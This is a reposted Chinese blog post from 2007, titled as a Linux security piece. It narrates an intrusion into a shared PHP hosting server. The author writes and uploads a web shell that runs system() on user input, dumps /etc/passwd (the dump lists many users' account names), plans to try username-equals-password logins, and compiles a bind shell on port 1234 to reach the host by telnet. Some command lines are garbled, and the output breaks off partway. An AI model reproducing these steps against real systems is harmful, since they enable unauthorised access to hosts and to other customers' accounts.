構建Linux下的安全,PHP配置漏洞攻擊(轉)

RegisterForBlog發表於2007-09-19
構建Linux下的安全,PHP配置漏洞攻擊(轉)[@more@]

  這些站點的問題主要出在允許使用system(),exec()等等這些函式,熟悉php的朋友應該知道,這些函式是呼叫系統指令的(雖然透過web server php程式只能有nobody許可權),而且一般使用者只要申請一個空間就可以獲取區域性的可寫許可權,令使用者可以寫一個web shell程式執行命令.在這些伺服器上一般使用者不能夠登陸,也就是nologin(沒有登陸shell,管理員可沒那麼"慷慨"!),這樣利用system(),exec()這些函式就可以bind一個shell出來~!本文以虎翼網()的空間為例子(他是不是所有的伺服器都有這個毛病我不知道~我只試驗了我的空間所在的伺服器):

  1.寫一個webshell先(php很容易做到)

  ?>php

  #shell.php3

  echo"
";

  system("$cmd");

  echo"
";

  ?>

  2.上傳到空間

  3.執行(具體的伺服器馬賽克處理)

  lynx (看一下許可權到底多大)

  uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)

  root真的很吝嗇啊!

  lynx -ras(看看系統)

  FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20

  00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386

  lynx

  /etc/passwd(shadow是鐵定看不到)

  root:*:0:0:Charlie &:/root:/bin/csh

  toor:*:0:0:Bourne-again Superuser:/root:

  daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin

  operator:*:2:5:System &:/:/sbin/nologin

  bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin

  tty:*:107353:51:USER:/home/tty:/local/bin/null

  kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin

  games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin

  news:*:8:8:News Subsystem:/:/sbin/nologin

  man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin

  bind:*:53:53:Bind Sandbox:/:/sbin/nologin

  uucp:*:66:66:UUCP

  pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico

  xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin

  pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin

  ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin

  nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

  quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin

  quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin

  quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin

  tian:*:1002:1002::/local/tian:/local/bin/ksh

  sysadmin:*:1001:1001:System

  Administrator:/local/sysadmin:/local/bin/ksh

  test2:*:9999:51::/home/test2:/local/bin/null

  xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin

  zhinan:*:106201:51:USER:/home/zhinan:/local/bin/null

  yes2:*:106202:51:USER:/home/yes2:/local/bin/null

  daboy:*:106203:51:USER:/home/daboy:/local/bin/null

  yesky:*:106204:51:USER:/home/yesky:/local/bin/null

  yesk:*:106205:51:USER:/home/yesk:/local/bin/null

  lnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/null

  fog:*:106207:51:USER:/home/fog:/local/bin/null

  renshou:*:106208:51:USER:/home/renshou:/local/bin/null

  hilen:*:106209:51:USER:/home/hilen:/local/bin/null

  hapybird:*:106210:51:USER:/home/hapybird:/sbin/nologin

  xiewei:*:106211:51:USER:/home/xiewei:/sbin/nologin

  wwwer:*:106212:51:USER:/home/wwwer:/local/bin/null

  larry:*:106213:51:USER:/home/larry:/local/bin/null

  sunboys:*:106214:51:USER:/home/sunboys:/local/bin/null

  everydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/null

  linguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/null

  baobao:*:106217:51:USER:/home/baobao:/local/bin/null

  chaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/null

  hrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/null

  dengxian:*:106220:51:USER:/home/dengxian:/local/bin/null

  simonstone:*:106221:51:USER:/home/simonstone:/local/bin/null

  chenjian:*:106222:51:USER:/home/chenjian:/local/bin/null

  lvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/null

  zzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/null

  pc2000:*:106225:51:USER:/home/pc2000:/local/bin/null

  startexcel:*:106226:51:USER:/home/startexcel:/local/bin/null

  model:*:106227:51:USER:/home/model:/local/bin/null

  leogirl:*:106228:51:USER:/home/leogirl:/local/bin/null

  fohcn:*:106229:51:USER:/home/fohcn:/local/bin/null

  ljok:*:106230:51:USER:/home/ljok:/local/bin/null

  baorui:*:106231:51:USER:/home/baorui:/local/bin/null

  fky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/null

  zhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/null

  xiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/null

  zyinter:*:106235:51:USER:/home/zyinter:/local/bin/null

  power:*:106236:51:USER:/home/power:/local/bin/null

  feefan:*:106237:51:USER:/home/feefan:/local/bin/null

  paradise:*:106238:51:USER:/home/paradise:/local/bin/null

  wulc:*:106239:51:USER:/home/wulc:/local/bin/null

  jcm:*:106240:51:USER:/home/jcm:/local/bin/null

  liangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/null

  jingder:*:106242:51:USER:/home/jingder:/local/bin/null

  hanjun:*:106243:51:USER:/home/hanjun:/local/bin/null

  adai:*:106244:51:USER:/home/adai:/local/bin/null

  fightben:*:106245:51:USER:/home/fightben:/local/bin/null

  lihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/null

  xeno:*:106247:51:USER:/home/xeno:/local/bin/null

  ..................(太多了~省略)

  只有幾個使用者有shell可以登陸,cp到我的目錄下面,等一下分離出usrename看看有沒有人username=passwd的~呵呵~

  lynx

  HOME=/

  PS1=$

  OPTIND=1

  PS2=>

  PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin

  IFS=

  好差的"環境",被設定成這樣....

  lynx /etc/hosts

  # $FreeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $

  #

  # Host Database

  # This file should contain the addresses and aliases

  # for local hosts that share this file.

  # In the presence of the domain name service or NIS, this file may

  # not be consulted at all; see /etc/host.conf for the resolution

  order.

  #

  #

  127.0.0.1 localhost localhost.my.domain myname.my.domain

  #

  # Imaginary network.

  #10.0.0.2 myname.my.domain myname

  #10.0.0.3 myfriend.my.domain myfriend

  #

  # According to RFC 1918, you can use the following IP networks for

  # private nets which will never be connected to the Internet:

  #

  # 10.0.0.0 - 10.255.255.255

  # 172.16.0.0 - 172.31.255.255

  # 192.168.0.0 - 192.168.255.255

  #

  #

  不算太小啊~hosts ~

  lynx -b gcc

  (老天保佑~有gcc)

  gcc:/usr/sbin/gcc(萬歲!!!!!!!!!!!!)

  我來試試看~弄一個大傢伙上去,編譯一下,哈哈~速度好快!

  webshell太累了,bind一個shell出來方便一點...(上傳binshell程式,自己寫也可以用perl/C,都不太難)

  lynx -o bind bindshell.c

  lynx 1234

  bind shell too port 1234

  telnet xxx.51.net 1234

  .....下面省略,反正就可以執行命令了

  嗯~好像這臺沒裝MySQL,可惜~呵呵~~~~~~~~~,對了oso.com.cn的好像有~,不過最近停了.....

  lynx -p

  localhost

  portmapper 100000 portmap sunrpc

  rstatd 100001 rstat rstat_svc rup perfmeter

  rusersd 100002 rusers

  nfs 100003 nfsprog

  ypserv 100004 ypprog

  mountd 100005 mount showmount

  ypbind 100007

  walld 100008 rwall shutdown

  yppasswdd 100009 yppasswd

  etherstatd 100010 etherstat

  rquotad 100011 rquotaprog quota rquota

  sprayd 100012 spray

  3270_mapper 100013

  rje_ma

  

·上一篇:

·下一篇:
 
     最新更新
·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·


| | | | | | |

Copyright © 2004 - 2007 All Rights Reserved

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10763080/viewspace-970146/,如需轉載,請註明出處,否則將追究法律責任。

構建Linux下的安全,PHP配置漏洞攻擊(轉)
請登入後發表評論 登入
全部評論

相關文章